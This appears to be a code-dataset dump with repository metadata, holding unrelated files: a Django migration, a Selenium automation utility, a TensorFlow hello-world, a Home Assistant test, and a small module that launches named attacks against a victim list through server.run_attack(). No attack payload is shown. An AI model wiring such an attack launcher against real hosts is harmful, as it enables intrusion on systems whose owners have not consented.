# execute the attack
server.run_attack(attack_type, victims)
# finalize the method by return True
return True
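A hedged sketch of how execute() appears to be driven; the SessionStorage setup and the attack/victim values are hypothetical, since only get_value() is visible here:

# Hypothetical invocation; assumes SessionStorage also exposes set_value().
storage = SessionStorage()
storage.set_value('list_attacks', 'example_attack')   # illustrative attack name
storage.set_value('list_victims', ['192.168.0.10'])   # illustrative victim list
assert execute(storage) is True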
| 25.0625
| 58
| 0.730673
|
import server
from core import SessionStorage
def execute(*args):
sessionStorage = args[0]
attack_type = sessionStorage.get_value('list_attacks')
victims = sessionStorage.get_value('list_victims')
server.run_attack(attack_type, victims)
return True
| true
| true
|
1c40ef47ff46714cf9f138acd5d81098e95454ef
| 407
|
py
|
Python
|
Django-habits-reminder/Django-habits-reminder/users/migrations/0002_profile_image.py
|
KrystianKlik/Django-habits-reminder
|
915e802aea87cbc48ae07c98701285379423cdf6
|
[
"MIT"
] | null | null | null |
Django-habits-reminder/Django-habits-reminder/users/migrations/0002_profile_image.py
|
KrystianKlik/Django-habits-reminder
|
915e802aea87cbc48ae07c98701285379423cdf6
|
[
"MIT"
] | 8
|
2021-03-19T08:39:55.000Z
|
2022-02-10T10:14:40.000Z
|
Django-habits-reminder/Django-habits-reminder/users/migrations/0002_profile_image.py
|
KrystianKlik/Django-habits-reminder
|
915e802aea87cbc48ae07c98701285379423cdf6
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.10 on 2020-02-24 08:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='profile',
name='image',
field=models.ImageField(default='default.jpg', upload_to='profile_pics'),
),
]
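The AddField operation mirrors a one-line model change; a hypothetical sketch of the field it introduces on the profile model (class name assumed from the migration):

# Hypothetical model definition matching the AddField above.
from django.db import models

class Profile(models.Model):
    image = models.ImageField(default='default.jpg', upload_to='profile_pics')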
| 21.421053
| 85
| 0.599509
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='profile',
name='image',
field=models.ImageField(default='default.jpg', upload_to='profile_pics'),
),
]
| true
| true
|
1c40f0d17df2d8045314b3bb535d6a2b05d9e18a
| 9,091
|
py
|
Python
|
common/utils_yml.py
|
linxichong/pyautotest
|
ca9483b00bdccaa9e7467e49cf4a1768b59cce26
|
[
"MIT"
] | null | null | null |
common/utils_yml.py
|
linxichong/pyautotest
|
ca9483b00bdccaa9e7467e49cf4a1768b59cce26
|
[
"MIT"
] | 4
|
2021-06-03T07:43:09.000Z
|
2022-03-12T00:48:44.000Z
|
common/utils_yml.py
|
linxichong/pyautotest
|
ca9483b00bdccaa9e7467e49cf4a1768b59cce26
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import os
import json
import time
from selenium.webdriver.common.alert import Alert
from common.enum import BrowserType, FlowNodeType, FlowNodeProp, Messages
import pyperclip
from types import MethodType, FunctionType
import copy
import random
from common.common import get_item, handle_option_yml, read_flowdata, recursive_set_data, handle_click, get_element_by_flow, open_file, repalce_dynamic_val, set_element_val, repalce_const_val, handle_option, get_elements_by_flow
from common import logger, const
from common.decorator import logit, doprocess, lognode
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
import csv
from webdriver_manager.chrome import ChromeDriverManager
# # Create a browser driver instance
# def create_driver(browser, useproxy):
#     # ie
#     if browser == BrowserType.IE.value:
#         driver = webdriver.Ie(executable_path=r"./drivers/IEDriverServer.exe")
#     # chrome
#     elif browser == BrowserType.Chrome.value:
#         chrome_options = webdriver.ChromeOptions()
#         # PROXY = '113.121.77.137:9999'
#         # # PROXY_AUTH = '{userid}:{password}'
#         # chrome_options.add_argument('--proxy-server=http://%s' % PROXY)
#         # option.add_argument('--proxy-auth=%s' % PROXY_AUTH)
#         # Suppress the "DevTools listening on ws://127.0.0.1..." message
#         chrome_options.add_experimental_option('excludeSwitches', ['enable-logging'])
#         # Whether to load the proxy extension
#         if useproxy:
#             chrome_options.add_extension("proxy.zip")
#         driver = webdriver.Chrome(
#             executable_path=r"./drivers/chromedriver.exe",
#             chrome_options=chrome_options)
#     return driver
def get_flow_items(flowdata_path):
flows = {}
for root, dirs, files in os.walk(flowdata_path, topdown=False):
if 'hidden' in root:
continue
for name in files:
if name.startswith('cmn_'):
continue
flows[name] = os.path.join(root, name)
return flows
def exec_flowdata(driver, filename, path):
try:
logger.info(Messages.Start_Flow % filename)
read_flowdata(driver, path, exec_flow_node)
logger.info(Messages.End_Flow % filename)
except Exception as e:
logger.error(Messages.Flow_Handle_Failed % e)
@lognode
@doprocess
def exec_flow_node(driver, type, flowdata):
    if flowdata:
        # Flow - open the target URL
        if type == FlowNodeType.Open.value:
            param = flowdata.get(FlowNodeProp.Params.value)
            if param:
                target_url = param
            else:
                # Get the target site URL
                target_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
            # Substitute constant values if any are present
            target_url = const.get_const_val(target_url)
            driver.get(target_url)
        # Flow - read a data file
        elif type == FlowNodeType.Read.value:
            # Element lookup method
            findmethod = get_item(flowdata, FlowNodeProp.FindMethod.value)
            # Path of the file to read
            target_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
            # Read the data file
            with open(target_url, encoding='utf-8') as f:
                mock_data = json.load(f)
            # Fill in the page automatically from the data file
            if mock_data:
                # Resolve constant values
                mock_data = const.repalce_const_val(mock_data)
                recursive_set_data(driver, By.__dict__[findmethod], mock_data)
        # Flow - handle single and double clicks
        elif type == FlowNodeType.Click.value or type == FlowNodeType.DbClick.value:
            handle_click(driver, flowdata, type)
        # Flow - handle alert dialogs
        elif type == FlowNodeType.Alert.value:
            # Wait for the alert to appear
            wait = WebDriverWait(driver, 10)
            wait.until(EC.alert_is_present())
            # Get the alert
            alert = driver.switch_to.alert
            # Confirm the alert (accept is the default action)
            alert.accept()
        # Flow - clipboard operation (copy)
        elif type == FlowNodeType.Copy.value:
            if flowdata.get(FlowNodeProp.FindMethod.value) != None:
                # Get the target element
                element = get_element_by_flow(driver, flowdata)
                if element.text:
                    copy_val = element.text
                elif element.get_attribute('value'):
                    copy_val = element.get_attribute('value')
            else:
                # Substitute constant values first if any are present
                flowdata = repalce_const_val(flowdata)
                flowdata = repalce_dynamic_val(flowdata)
                copy_val = get_item(flowdata, FlowNodeProp.ItemVal.value)
            # Copy to the clipboard
            pyperclip.copy(copy_val)
        # Flow - clipboard operation (paste)
        elif type == FlowNodeType.Paste.value:
            # Get the target element
            element = get_element_by_flow(driver, flowdata)
            # Paste from the clipboard
            setval = pyperclip.paste()
            if setval:
                element.clear()
                # Prefer the constant value
                val = const.get_const_val(setval)
                element.send_keys(val)
        # Flow - add a cached value
        elif type == FlowNodeType.Cache.value:
            # Get the cache value to set
            val = get_item(flowdata, FlowNodeProp.ItemVal.value)
            if isinstance(val, str):
                # Prefer the constant value
                val = const.get_const_val(val)
                setval = val
            elif isinstance(val, object):
                setval = json.dumps(val)
            # Get the cache key
            cachekey = get_item(flowdata, FlowNodeProp.CacheKey.value)
            # Add a browser cookie
            driver.add_cookie({'name': cachekey, 'value': setval})
        # Flow - set a page element value
        elif type == FlowNodeType.SetVal.value:
            # Substitute constant values first if any are present
            flowdata = repalce_const_val(flowdata)
            # Resolve dynamically generated item values
            flowdata = repalce_dynamic_val(flowdata)
            # Target element
            target = get_item(flowdata, FlowNodeProp.Target.value)
            # Lookup method for the target element
            findmethod = get_item(flowdata, FlowNodeProp.FindMethod.value)
            # Dynamically generated item value
            itemval = get_item(flowdata, FlowNodeProp.ItemVal.value)
            # Set the value on the specified element
            set_element_val(driver, By.__dict__[findmethod], itemval, target)
        # Flow - loop operation
        elif type == FlowNodeType.For.value:
            # Child flow nodes
            child_flows = get_item(flowdata, FlowNodeProp.Flow.value)
            if FlowNodeProp.StartIdx.value in flowdata and FlowNodeProp.EndIdx.value in flowdata:
                # Start index
                startIdx = get_item(flowdata, FlowNodeProp.StartIdx.value)
                # End index
                endIdx = get_item(flowdata, FlowNodeProp.EndIdx.value)
                # Loop over the given index range
                for idx in range(int(startIdx), int(endIdx) + 1):
                    handle_for_childflow(driver, child_flows, idx)
            elif FlowNodeProp.TargetURL.value in flowdata:
                # Path of the file to read
                target_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
                with open(target_url) as csvfile:
                    for row in csv.reader(csvfile):
                        handle_for_childflow(driver, child_flows, row[0])
            else:
                # Get the list of target elements
                elements = get_elements_by_flow(driver, flowdata)
                # Process each element in the list
                for element in elements:
                    handle_for_childflow(driver, child_flows, element)
        # Flow - load an existing flow file
        elif type == FlowNodeType.FlowFile.value:
            # Path of the file to read
            file_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
            param = flowdata.get(FlowNodeProp.Params.value)
            read_flowdata(driver, file_url, exec_flow_node, param)
        # Flow - mouse/keyboard operation
        elif type == FlowNodeType.KeyBoard.value:
            # Read the keyboard operation
            itemval = get_item(flowdata, FlowNodeProp.ItemVal.value)
            # Get the repeat count
            count = flowdata.get(FlowNodeProp.Count.value, 1)
            source = None
            if FlowNodeProp.Target.value in flowdata and FlowNodeProp.FindMethod.value in flowdata:
                # Read the specified element
                source = get_element_by_flow(driver, flowdata)
            else:
                source = driver
            for i in range(count):
                source.send_keys(Keys.__dict__[itemval])
                # ActionChains(source).send_keys(Keys.__dict__[itemval]).perform()
        # Get the node's optional operation config
        option = flowdata.get(FlowNodeProp.Option.value)
        if option:
            # Handle the optional operation
            handle_option_yml(driver, option)
""" 处理循环中的子节点 """
def handle_for_childflow(driver, child_flows, params):
# 处理子流程节点
for flow in child_flows:
# 原始流程节点
source_childflow = child_flows[flow]
# 浅拷贝临时流程节点
temp_childflow = copy.copy(source_childflow)
temp_childflow[FlowNodeProp.Params.value] = params
# 处理子流程节点
exec_flow_node(driver, flow, temp_childflow)
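A hedged example of a flow node that exec_flow_node() would dispatch as an Open step; the key and enum values follow FlowNodeType/FlowNodeProp as used above, and the URL is illustrative:

# Illustrative node data; `driver` is assumed to be a live Selenium WebDriver.
flowdata = {
    FlowNodeProp.TargetURL.value: 'https://example.com/login',  # hypothetical URL
}
exec_flow_node(driver, FlowNodeType.Open.value, flowdata)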
| 40.225664
| 228
| 0.605104
|
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import os
import json
import time
from selenium.webdriver.common.alert import Alert
from common.enum import BrowserType, FlowNodeType, FlowNodeProp, Messages
import pyperclip
from types import MethodType, FunctionType
import copy
import random
from common.common import get_item, handle_option_yml, read_flowdata, recursive_set_data, handle_click, get_element_by_flow, open_file, repalce_dynamic_val, set_element_val, repalce_const_val, handle_option, get_elements_by_flow
from common import logger, const
from common.decorator import logit, doprocess, lognode
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
import csv
from webdriver_manager.chrome import ChromeDriverManager
def get_flow_items(flowdata_path):
    flows = {}
    for root, dirs, files in os.walk(flowdata_path, topdown=False):
        if 'hidden' in root:
            continue
        for name in files:
            if name.startswith('cmn_'):
                continue
            flows[name] = os.path.join(root, name)
    return flows
def exec_flowdata(driver, filename, path):
try:
logger.info(Messages.Start_Flow % filename)
read_flowdata(driver, path, exec_flow_node)
logger.info(Messages.End_Flow % filename)
except Exception as e:
logger.error(Messages.Flow_Handle_Failed % e)
@lognode
@doprocess
def exec_flow_node(driver, type, flowdata):
if flowdata:
if type == FlowNodeType.Open.value:
param = flowdata.get(FlowNodeProp.Params.value)
if param:
target_url = param
else:
target_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
target_url = const.get_const_val(target_url)
driver.get(target_url)
elif type == FlowNodeType.Read.value:
findmethod = get_item(flowdata, FlowNodeProp.FindMethod.value)
target_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
with open(target_url, encoding='utf-8') as f:
mock_data = json.load(f)
if mock_data:
mock_data = const.repalce_const_val(mock_data)
recursive_set_data(driver, By.__dict__[findmethod], mock_data)
elif type == FlowNodeType.Click.value or type == FlowNodeType.DbClick.value:
handle_click(driver, flowdata, type)
elif type == FlowNodeType.Alert.value:
wait = WebDriverWait(driver, 10)
wait.until(EC.alert_is_present())
alert = driver.switch_to.alert
alert.accept()
elif type == FlowNodeType.Copy.value:
if flowdata.get(FlowNodeProp.FindMethod.value) != None:
element = get_element_by_flow(driver, flowdata)
if element.text:
copy_val = element.text
elif element.get_attribute('value'):
copy_val = element.get_attribute('value')
else:
flowdata = repalce_const_val(flowdata)
flowdata = repalce_dynamic_val(flowdata)
copy_val = get_item(flowdata, FlowNodeProp.ItemVal.value)
pyperclip.copy(copy_val)
elif type == FlowNodeType.Paste.value:
element = get_element_by_flow(driver, flowdata)
setval = pyperclip.paste()
if setval:
element.clear()
val = const.get_const_val(setval)
element.send_keys(val)
elif type == FlowNodeType.Cache.value:
val = get_item(flowdata, FlowNodeProp.ItemVal.value)
if isinstance(val, str):
val = const.get_const_val(val)
setval = val
elif isinstance(val, object):
setval = json.dumps(val)
cachekey = get_item(flowdata, FlowNodeProp.CacheKey.value)
driver.add_cookie({'name': cachekey, 'value': setval})
elif type == FlowNodeType.SetVal.value:
flowdata = repalce_const_val(flowdata)
flowdata = repalce_dynamic_val(flowdata)
target = get_item(flowdata, FlowNodeProp.Target.value)
findmethod = get_item(flowdata, FlowNodeProp.FindMethod.value)
itemval = get_item(flowdata, FlowNodeProp.ItemVal.value)
set_element_val(driver, By.__dict__[findmethod], itemval, target)
elif type == FlowNodeType.For.value:
child_flows = get_item(flowdata, FlowNodeProp.Flow.value)
if FlowNodeProp.StartIdx.value in flowdata and FlowNodeProp.EndIdx.value in flowdata:
startIdx = get_item(flowdata, FlowNodeProp.StartIdx.value)
endIdx = get_item(flowdata, FlowNodeProp.EndIdx.value)
for idx in range(int(startIdx), int(endIdx) + 1):
handle_for_childflow(driver, child_flows, idx)
elif FlowNodeProp.TargetURL.value in flowdata:
target_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
with open(target_url) as csvfile:
for row in csv.reader(csvfile):
handle_for_childflow(driver, child_flows, row[0])
else:
elements = get_elements_by_flow(driver, flowdata)
for element in elements:
handle_for_childflow(driver, child_flows, element)
elif type == FlowNodeType.FlowFile.value:
file_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
param = flowdata.get(FlowNodeProp.Params.value)
read_flowdata(driver, file_url, exec_flow_node, param)
elif type == FlowNodeType.KeyBoard.value:
itemval = get_item(flowdata, FlowNodeProp.ItemVal.value)
count = flowdata.get(FlowNodeProp.Count.value, 1)
source = None
if FlowNodeProp.Target.value in flowdata and FlowNodeProp.FindMethod.value in flowdata:
source = get_element_by_flow(driver, flowdata)
else:
source = driver
for i in range(count):
source.send_keys(Keys.__dict__[itemval])
option = flowdata.get(FlowNodeProp.Option.value)
if option:
handle_option_yml(driver, option)
def handle_for_childflow(driver, child_flows, params):
for flow in child_flows:
source_childflow = child_flows[flow]
temp_childflow = copy.copy(source_childflow)
temp_childflow[FlowNodeProp.Params.value] = params
exec_flow_node(driver, flow, temp_childflow)
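# --- Hedged usage sketch (editor addition; the exact schema lives in common.common) ---
# A flow file consumed by read_flowdata is assumed to map node types to the
# FlowNodeProp keys handled above, along these lines (YAML-ish, illustrative):
#
#   Open:
#     TargetURL: https://example.com/login
#   SetVal:
#     FindMethod: ID
#     Target: username
#     ItemVal: alice
#   Click:
#     FindMethod: ID
#     Target: submit
#
# exec_flowdata(driver, 'login.yml', 'flows/login.yml') would then replay the
# nodes in order against a live WebDriver session.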
| true
| true
|
1c40f315bb2de5005ee660d0aceb624424c052f9
| 522
|
py
|
Python
|
examples/1_Introduction/helloworld.py
|
kar-thik/TensorFlow-Examples
|
2097ad0a6faf55a4a9cee00cc1b0ae3454b178fc
|
[
"MIT"
] | 23
|
2017-07-07T07:00:52.000Z
|
2022-03-09T06:49:17.000Z
|
examples/1_Introduction/helloworld.py
|
kar-thik/TensorFlow-Examples
|
2097ad0a6faf55a4a9cee00cc1b0ae3454b178fc
|
[
"MIT"
] | 1
|
2020-01-07T06:27:59.000Z
|
2020-04-04T17:06:05.000Z
|
examples/1_Introduction/helloworld.py
|
kar-thik/TensorFlow-Examples
|
2097ad0a6faf55a4a9cee00cc1b0ae3454b178fc
|
[
"MIT"
] | 26
|
2017-06-13T01:44:24.000Z
|
2021-06-17T18:11:26.000Z
|
'''
HelloWorld example using TensorFlow library.
Author: Aymeric Damien
Project: https://github.com/aymericdamien/TensorFlow-Examples/
'''
from __future__ import print_function
import tensorflow as tf
# Simple hello world using TensorFlow
# Create a Constant op
# The op is added as a node to the default graph.
#
# The value returned by the constructor represents the output
# of the Constant op.
hello = tf.constant('Hello, TensorFlow!')
# Start tf session
sess = tf.Session()
# Run the op
print(sess.run(hello))
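# --- Hedged note (editor addition) ---
# This is TensorFlow 1.x graph/session style. Under TensorFlow 2.x the same
# example needs the compatibility layer, e.g.:
#   import tensorflow.compat.v1 as tf
#   tf.disable_eager_execution()
# before building the graph, because tf.Session is no longer part of the 2.x API.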
| 20.076923
| 62
| 0.758621
|
from __future__ import print_function
import tensorflow as tf
hello = tf.constant('Hello, TensorFlow!')
sess = tf.Session()
print(sess.run(hello))
| true
| true
|
1c40f352ff0180872c40eee0f3b7b37879d3f85f
| 6,712
|
py
|
Python
|
tests/components/light/test_reproduce_state.py
|
olbjan/home-assistant-1
|
1adb45f74e96fc5eff137a3727647a7e428e123c
|
[
"Apache-2.0"
] | 7
|
2019-02-07T14:14:12.000Z
|
2019-07-28T06:56:10.000Z
|
tests/components/light/test_reproduce_state.py
|
tomachristian/core
|
71c8fcee20c55536b33c3ee774c76c1795f37cd2
|
[
"Apache-2.0"
] | 6
|
2021-02-08T20:54:31.000Z
|
2022-03-12T00:50:43.000Z
|
tests/components/light/test_reproduce_state.py
|
tomachristian/core
|
71c8fcee20c55536b33c3ee774c76c1795f37cd2
|
[
"Apache-2.0"
] | 2
|
2020-04-19T13:35:24.000Z
|
2020-04-19T13:35:51.000Z
|
"""Test reproduce state for Light."""
from homeassistant.components.light.reproduce_state import DEPRECATION_WARNING
from homeassistant.core import State
from tests.common import async_mock_service
VALID_BRIGHTNESS = {"brightness": 180}
VALID_WHITE_VALUE = {"white_value": 200}
VALID_FLASH = {"flash": "short"}
VALID_EFFECT = {"effect": "random"}
VALID_TRANSITION = {"transition": 15}
VALID_COLOR_NAME = {"color_name": "red"}
VALID_COLOR_TEMP = {"color_temp": 240}
VALID_HS_COLOR = {"hs_color": (345, 75)}
VALID_KELVIN = {"kelvin": 4000}
VALID_PROFILE = {"profile": "relax"}
VALID_RGB_COLOR = {"rgb_color": (255, 63, 111)}
VALID_XY_COLOR = {"xy_color": (0.59, 0.274)}
async def test_reproducing_states(hass, caplog):
"""Test reproducing Light states."""
hass.states.async_set("light.entity_off", "off", {})
hass.states.async_set("light.entity_bright", "on", VALID_BRIGHTNESS)
hass.states.async_set("light.entity_white", "on", VALID_WHITE_VALUE)
hass.states.async_set("light.entity_flash", "on", VALID_FLASH)
hass.states.async_set("light.entity_effect", "on", VALID_EFFECT)
hass.states.async_set("light.entity_trans", "on", VALID_TRANSITION)
hass.states.async_set("light.entity_name", "on", VALID_COLOR_NAME)
hass.states.async_set("light.entity_temp", "on", VALID_COLOR_TEMP)
hass.states.async_set("light.entity_hs", "on", VALID_HS_COLOR)
hass.states.async_set("light.entity_kelvin", "on", VALID_KELVIN)
hass.states.async_set("light.entity_profile", "on", VALID_PROFILE)
hass.states.async_set("light.entity_rgb", "on", VALID_RGB_COLOR)
hass.states.async_set("light.entity_xy", "on", VALID_XY_COLOR)
turn_on_calls = async_mock_service(hass, "light", "turn_on")
turn_off_calls = async_mock_service(hass, "light", "turn_off")
    # These calls should do nothing, as the entities are already in the desired state
await hass.helpers.state.async_reproduce_state(
[
State("light.entity_off", "off"),
State("light.entity_bright", "on", VALID_BRIGHTNESS),
State("light.entity_white", "on", VALID_WHITE_VALUE),
State("light.entity_flash", "on", VALID_FLASH),
State("light.entity_effect", "on", VALID_EFFECT),
State("light.entity_trans", "on", VALID_TRANSITION),
State("light.entity_name", "on", VALID_COLOR_NAME),
State("light.entity_temp", "on", VALID_COLOR_TEMP),
State("light.entity_hs", "on", VALID_HS_COLOR),
State("light.entity_kelvin", "on", VALID_KELVIN),
State("light.entity_profile", "on", VALID_PROFILE),
State("light.entity_rgb", "on", VALID_RGB_COLOR),
State("light.entity_xy", "on", VALID_XY_COLOR),
],
blocking=True,
)
assert len(turn_on_calls) == 0
assert len(turn_off_calls) == 0
# Test invalid state is handled
await hass.helpers.state.async_reproduce_state(
[State("light.entity_off", "not_supported")], blocking=True
)
assert "not_supported" in caplog.text
assert len(turn_on_calls) == 0
assert len(turn_off_calls) == 0
# Make sure correct services are called
await hass.helpers.state.async_reproduce_state(
[
State("light.entity_xy", "off"),
State("light.entity_off", "on", VALID_BRIGHTNESS),
State("light.entity_bright", "on", VALID_WHITE_VALUE),
State("light.entity_white", "on", VALID_FLASH),
State("light.entity_flash", "on", VALID_EFFECT),
State("light.entity_effect", "on", VALID_TRANSITION),
State("light.entity_trans", "on", VALID_COLOR_NAME),
State("light.entity_name", "on", VALID_COLOR_TEMP),
State("light.entity_temp", "on", VALID_HS_COLOR),
State("light.entity_hs", "on", VALID_KELVIN),
State("light.entity_kelvin", "on", VALID_PROFILE),
State("light.entity_profile", "on", VALID_RGB_COLOR),
State("light.entity_rgb", "on", VALID_XY_COLOR),
],
blocking=True,
)
assert len(turn_on_calls) == 12
expected_calls = []
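    # Note: the assignments below alias the module-level VALID_* dicts and
    # mutate them in place by adding "entity_id"; that is safe here only
    # because each dict is consumed exactly once in this test.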
expected_off = VALID_BRIGHTNESS
expected_off["entity_id"] = "light.entity_off"
expected_calls.append(expected_off)
expected_bright = VALID_WHITE_VALUE
expected_bright["entity_id"] = "light.entity_bright"
expected_calls.append(expected_bright)
expected_white = VALID_FLASH
expected_white["entity_id"] = "light.entity_white"
expected_calls.append(expected_white)
expected_flash = VALID_EFFECT
expected_flash["entity_id"] = "light.entity_flash"
expected_calls.append(expected_flash)
expected_effect = VALID_TRANSITION
expected_effect["entity_id"] = "light.entity_effect"
expected_calls.append(expected_effect)
expected_trans = VALID_COLOR_NAME
expected_trans["entity_id"] = "light.entity_trans"
expected_calls.append(expected_trans)
expected_name = VALID_COLOR_TEMP
expected_name["entity_id"] = "light.entity_name"
expected_calls.append(expected_name)
expected_temp = VALID_HS_COLOR
expected_temp["entity_id"] = "light.entity_temp"
expected_calls.append(expected_temp)
expected_hs = VALID_KELVIN
expected_hs["entity_id"] = "light.entity_hs"
expected_calls.append(expected_hs)
expected_kelvin = VALID_PROFILE
expected_kelvin["entity_id"] = "light.entity_kelvin"
expected_calls.append(expected_kelvin)
expected_profile = VALID_RGB_COLOR
expected_profile["entity_id"] = "light.entity_profile"
expected_calls.append(expected_profile)
expected_rgb = VALID_XY_COLOR
expected_rgb["entity_id"] = "light.entity_rgb"
expected_calls.append(expected_rgb)
for call in turn_on_calls:
assert call.domain == "light"
found = False
for expected in expected_calls:
if call.data["entity_id"] == expected["entity_id"]:
# We found the matching entry
assert call.data == expected
found = True
break
        # Fail the test if no matching entry was found
assert found
assert len(turn_off_calls) == 1
assert turn_off_calls[0].domain == "light"
assert turn_off_calls[0].data == {"entity_id": "light.entity_xy"}
async def test_deprecation_warning(hass, caplog):
"""Test deprecation warning."""
hass.states.async_set("light.entity_off", "off", {})
turn_on_calls = async_mock_service(hass, "light", "turn_on")
await hass.helpers.state.async_reproduce_state(
[State("light.entity_off", "on", {"brightness_pct": 80})], blocking=True
)
assert len(turn_on_calls) == 1
assert DEPRECATION_WARNING % ["brightness_pct"] in caplog.text
| 39.482353
| 80
| 0.681317
|
from homeassistant.components.light.reproduce_state import DEPRECATION_WARNING
from homeassistant.core import State
from tests.common import async_mock_service
VALID_BRIGHTNESS = {"brightness": 180}
VALID_WHITE_VALUE = {"white_value": 200}
VALID_FLASH = {"flash": "short"}
VALID_EFFECT = {"effect": "random"}
VALID_TRANSITION = {"transition": 15}
VALID_COLOR_NAME = {"color_name": "red"}
VALID_COLOR_TEMP = {"color_temp": 240}
VALID_HS_COLOR = {"hs_color": (345, 75)}
VALID_KELVIN = {"kelvin": 4000}
VALID_PROFILE = {"profile": "relax"}
VALID_RGB_COLOR = {"rgb_color": (255, 63, 111)}
VALID_XY_COLOR = {"xy_color": (0.59, 0.274)}
async def test_reproducing_states(hass, caplog):
hass.states.async_set("light.entity_off", "off", {})
hass.states.async_set("light.entity_bright", "on", VALID_BRIGHTNESS)
hass.states.async_set("light.entity_white", "on", VALID_WHITE_VALUE)
hass.states.async_set("light.entity_flash", "on", VALID_FLASH)
hass.states.async_set("light.entity_effect", "on", VALID_EFFECT)
hass.states.async_set("light.entity_trans", "on", VALID_TRANSITION)
hass.states.async_set("light.entity_name", "on", VALID_COLOR_NAME)
hass.states.async_set("light.entity_temp", "on", VALID_COLOR_TEMP)
hass.states.async_set("light.entity_hs", "on", VALID_HS_COLOR)
hass.states.async_set("light.entity_kelvin", "on", VALID_KELVIN)
hass.states.async_set("light.entity_profile", "on", VALID_PROFILE)
hass.states.async_set("light.entity_rgb", "on", VALID_RGB_COLOR)
hass.states.async_set("light.entity_xy", "on", VALID_XY_COLOR)
turn_on_calls = async_mock_service(hass, "light", "turn_on")
turn_off_calls = async_mock_service(hass, "light", "turn_off")
await hass.helpers.state.async_reproduce_state(
[
State("light.entity_off", "off"),
State("light.entity_bright", "on", VALID_BRIGHTNESS),
State("light.entity_white", "on", VALID_WHITE_VALUE),
State("light.entity_flash", "on", VALID_FLASH),
State("light.entity_effect", "on", VALID_EFFECT),
State("light.entity_trans", "on", VALID_TRANSITION),
State("light.entity_name", "on", VALID_COLOR_NAME),
State("light.entity_temp", "on", VALID_COLOR_TEMP),
State("light.entity_hs", "on", VALID_HS_COLOR),
State("light.entity_kelvin", "on", VALID_KELVIN),
State("light.entity_profile", "on", VALID_PROFILE),
State("light.entity_rgb", "on", VALID_RGB_COLOR),
State("light.entity_xy", "on", VALID_XY_COLOR),
],
blocking=True,
)
assert len(turn_on_calls) == 0
assert len(turn_off_calls) == 0
await hass.helpers.state.async_reproduce_state(
[State("light.entity_off", "not_supported")], blocking=True
)
assert "not_supported" in caplog.text
assert len(turn_on_calls) == 0
assert len(turn_off_calls) == 0
await hass.helpers.state.async_reproduce_state(
[
State("light.entity_xy", "off"),
State("light.entity_off", "on", VALID_BRIGHTNESS),
State("light.entity_bright", "on", VALID_WHITE_VALUE),
State("light.entity_white", "on", VALID_FLASH),
State("light.entity_flash", "on", VALID_EFFECT),
State("light.entity_effect", "on", VALID_TRANSITION),
State("light.entity_trans", "on", VALID_COLOR_NAME),
State("light.entity_name", "on", VALID_COLOR_TEMP),
State("light.entity_temp", "on", VALID_HS_COLOR),
State("light.entity_hs", "on", VALID_KELVIN),
State("light.entity_kelvin", "on", VALID_PROFILE),
State("light.entity_profile", "on", VALID_RGB_COLOR),
State("light.entity_rgb", "on", VALID_XY_COLOR),
],
blocking=True,
)
assert len(turn_on_calls) == 12
expected_calls = []
expected_off = VALID_BRIGHTNESS
expected_off["entity_id"] = "light.entity_off"
expected_calls.append(expected_off)
expected_bright = VALID_WHITE_VALUE
expected_bright["entity_id"] = "light.entity_bright"
expected_calls.append(expected_bright)
expected_white = VALID_FLASH
expected_white["entity_id"] = "light.entity_white"
expected_calls.append(expected_white)
expected_flash = VALID_EFFECT
expected_flash["entity_id"] = "light.entity_flash"
expected_calls.append(expected_flash)
expected_effect = VALID_TRANSITION
expected_effect["entity_id"] = "light.entity_effect"
expected_calls.append(expected_effect)
expected_trans = VALID_COLOR_NAME
expected_trans["entity_id"] = "light.entity_trans"
expected_calls.append(expected_trans)
expected_name = VALID_COLOR_TEMP
expected_name["entity_id"] = "light.entity_name"
expected_calls.append(expected_name)
expected_temp = VALID_HS_COLOR
expected_temp["entity_id"] = "light.entity_temp"
expected_calls.append(expected_temp)
expected_hs = VALID_KELVIN
expected_hs["entity_id"] = "light.entity_hs"
expected_calls.append(expected_hs)
expected_kelvin = VALID_PROFILE
expected_kelvin["entity_id"] = "light.entity_kelvin"
expected_calls.append(expected_kelvin)
expected_profile = VALID_RGB_COLOR
expected_profile["entity_id"] = "light.entity_profile"
expected_calls.append(expected_profile)
expected_rgb = VALID_XY_COLOR
expected_rgb["entity_id"] = "light.entity_rgb"
expected_calls.append(expected_rgb)
for call in turn_on_calls:
assert call.domain == "light"
found = False
for expected in expected_calls:
if call.data["entity_id"] == expected["entity_id"]:
assert call.data == expected
found = True
break
assert found
assert len(turn_off_calls) == 1
assert turn_off_calls[0].domain == "light"
assert turn_off_calls[0].data == {"entity_id": "light.entity_xy"}
async def test_deprecation_warning(hass, caplog):
hass.states.async_set("light.entity_off", "off", {})
turn_on_calls = async_mock_service(hass, "light", "turn_on")
await hass.helpers.state.async_reproduce_state(
[State("light.entity_off", "on", {"brightness_pct": 80})], blocking=True
)
assert len(turn_on_calls) == 1
assert DEPRECATION_WARNING % ["brightness_pct"] in caplog.text
| true
| true
|
1c40f405c2c15916fe6045fd7c3a17301d922752
| 3,574
|
py
|
Python
|
SCRAM/Core/SiteConfig.py
|
gudrutis/pySCRAM
|
662aa639caa52d0ccc931f0ed41f245ad37c9765
|
[
"MIT"
] | 5
|
2015-09-15T15:07:43.000Z
|
2021-11-15T08:07:47.000Z
|
SCRAM/Core/SiteConfig.py
|
gudrutis/pySCRAM
|
662aa639caa52d0ccc931f0ed41f245ad37c9765
|
[
